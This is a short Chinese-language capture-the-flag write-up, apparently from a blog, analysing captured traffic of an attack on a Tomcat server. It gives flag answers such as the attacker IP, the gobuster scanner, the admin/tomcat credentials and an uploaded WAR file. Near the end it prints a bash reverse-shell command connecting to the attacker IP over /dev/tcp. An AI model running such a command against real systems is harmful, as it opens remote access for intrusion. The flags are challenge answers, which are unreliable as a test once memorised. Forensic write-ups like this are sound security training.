流量特征分析-常见攻击事件 tomcat-DIDCTF-WP

tomcat-1、tomcat-3

image-20240406001023224

http过滤,异常ip: flag{14.0.0.120}

顺带看到访问的web服务器管理面板端口:8080 flag{8080}(tomcat-3)

tomcat-2

查询攻击者ip地址

image-20240405213511348

flag{guangzhou}

tomcat-4

通过分析到使用工具为gobuster

image-20240405214151912

flag{gobuster}

tomcat-5

没有认证或认证不成功会返回401,认证标识Authorization: Basic,返回值为200的

image-20240405233420704

image-20240405233441274

flag{admin-tomcat}

tomcat-6

image-20240405233649564

搜索后只有这一个

image-20240405233725319

flag{JXQOZY.war}

tomcat-7

1
/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'

未完待续。。。

信息安全 > CTF
#MISC
流量特征分析-常见攻击事件 tomcat-DIDCTF-WP
https://www.305871230.xyz/posts/2998798902/
作者
游理
发布于
2024年4月5日
许可协议